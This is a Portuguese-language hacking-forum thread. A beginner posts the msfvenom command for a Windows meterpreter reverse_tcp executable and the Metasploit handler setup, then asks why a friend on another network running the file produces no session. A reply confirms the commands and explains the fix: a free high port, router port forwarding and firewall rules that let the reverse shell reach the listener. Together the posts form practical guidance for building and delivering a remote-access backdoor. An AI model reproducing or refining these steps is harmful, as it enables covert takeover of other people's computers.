CaveiraTech Fórum
collapse

Ajuda Fazer uma conexão com um backdoor


Offline K1TSUNE

  • L4MM3R
  • *
    • Posts: 7
  • 1 2 3 4
  • Liked: 3
  • Likes Given: 25
Olá amigos.
Eu estou iniciando na aprendizagem, mas eu gostaria de pedir ajuda a quem já sabe o caminho certo.
Então..
Eu criei um backdoor que na teoria eu teria que conseguir o acesso a o PC do meu amigo(ele está me ajudando testando cada backdoor que eu faço pra ver se funciona)
Bom, eu criei vários, mas em nenhuma vez que ele abriu eu consegui me conectar com a máquina dele(não estamos na mesma rede)
Eis aqui o processo de criação que eu acho que fiz algo errado ou deixei de fazer algo.
Obrigada desde já por ler.

msfvenom -p windows/meterpreter/reverse_tcp lhost=meuip lport=444 -a x64 -f exe > Lullaby.exe
Depois disso, eu fui pro msfconsole.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost = ip que eu coloquei no msfvenom
set lport = a porta que eu coloquei no msfvenom
Exploit
Bom, a partir daí, eu mando o arquivo .exe pro meu amigo que usa o Windows e ele sempre abre (sem a utilização de anti virus, até mesmo o windows defender) e eu nunca consigo me conectar com ele
fica aparencendo isso:
  • Started reverse TCP handler on (meu ip)
  • Fica aparecendo isso pra sempre, não importa qnts vezes ele abra, sempre a msm msg... Já tentei dar sessions -i mas n existe nenhuma.
Eu sou doida, tenho atestado
Discord: 19y#2783


Offline muhx

  • SCR1PTK1DD13
  • ***
    • Posts: 137
  • Bravo Hotel
  • Liked: 50
  • Likes Given: 6
Olá K1TSUNE.

Todo o processo está correto.

Só tome o cuidado de verificar a arquitetura específicada para o payload. Nesse caso você especificou a arquitetura x64. Se o sistema do alvo não suportar, você então terá problemas. (acredido que este não é o caso, mas vale o alerta).

Todo o processo que mencionou está correto, como eu disse. Aparentemente alguém está rejeitando a conexão. Pode ser o próprio alvo com um firewall, por exemplo. Ou você (mais provável).

Verifique se o alvo possuí uma rota limpa até o seu Metasploit. Com isso quero dizer, Verifique o encaminhamento de portas no roteador, Firewall (roteador/local), portas abertas localmente.

Depois de verificar tudo isso e constatar que não há mais problemas, tente outra vez.

Se o problema persistir, fique à vontade para postar por aqui.
« Última modificação: 13 de Abril de 2021, 18:30 por muhx »


Offline K1TSUNE

  • L4MM3R
  • *
    • Posts: 7
  • 1 2 3 4
  • Liked: 3
  • Likes Given: 25
Hello, muhx.


KKK MEU DEUS
Então significa que a porta é tão importante ? nossa eu achei q poderia colocar uma porta aleatória. mds q vergonhakk

Então, eu não sei se eu to fazendo certo, porém, eu acabei de dar um nmap na minha rede e vi que as portas:
53/tcp / service: domain

2000/tcp / service: cisco-sccp

8291/tcp / unknown

Estão com status OPEN.

São essas portas que eu deveria utilizar pra fazer a conexão?
Eu sou doida, tenho atestado
Discord: 19y#2783


Offline muhx

  • SCR1PTK1DD13
  • ***
    • Posts: 137
  • Bravo Hotel
  • Liked: 50
  • Likes Given: 6
Essas portas abertas já estão sendo utilizadas por alguma outra aplicação, você não deve utilizá-las.

Na verdade você pode utilizar qualquer porta entre 1-65535, desde que não conflite com nenhuma outra porta. Geralmente a melhor opção são as portas altas (>=1024), portas inferiores a esta normalmente são utilizadas por serviços comuns.

A questão é sobre a rota, não sobre a porta em si. Quando você abre um listenner no Metasploit ele espera receber uma conexão em uma determinada porta, para que isso possa acontecer você precisa certificar-se de que há rota entre alguém da rede externa e sua máquina com o Metasploit.

Um port forward mal configurado ou não configurado nunca encaminhará a conexão recebida pelo roteador até sua máquina.
« Última modificação: 14 de Abril de 2021, 13:10 por muhx »


 

* CaveiraTech YouTube

* Facebook

Guilherme Junqueira
04 de Fevereiro de 2019, 18:01 por Guilherme Junqueira
Views: 67041 | Comments: 27

Infelizmente a seção de Grupos de estudos do fórum estava sendo usada por organizações criminosas para recruta...
Guilherme Junqueira
27 de Julho de 2018, 17:30 por Guilherme Junqueira
Views: 43358 | Comments: 64

Pessoal, estou pensando seriamente na possibilidade de criar um novo fórum, só que voltado 100% à programação....
Guilherme Junqueira
26 de Junho de 2018, 20:25 por Guilherme Junqueira
Views: 25609 | Comments: 41

Resolvi fazer uma enquete para ver qual o posicionamento político da maioria aqui no fórum. O Alobus já fez um...
Guilherme Junqueira
20 de Junho de 2018, 12:56 por Guilherme Junqueira
Views: 30801 | Comments: 63

Últimamente o fórum vem sofrendo com muitas pessoas postando pirataria e esse não é o intuito do mesmo. A pira...
Guilherme Junqueira
20 de Fevereiro de 2018, 20:18 por Guilherme Junqueira
Views: 19185 | Comments: 4

Boa noite pessoal, venho apresentar para vocêsYou are not allowed to view links. Register or Login...

* Equipe

Guilherme Junqueira admin Guilherme Junqueira
Administrador
Luiz Viana admin Luiz Viana
Administrador
Alobus gmod Alobus
Moderador Geral

* Tópicos Recentes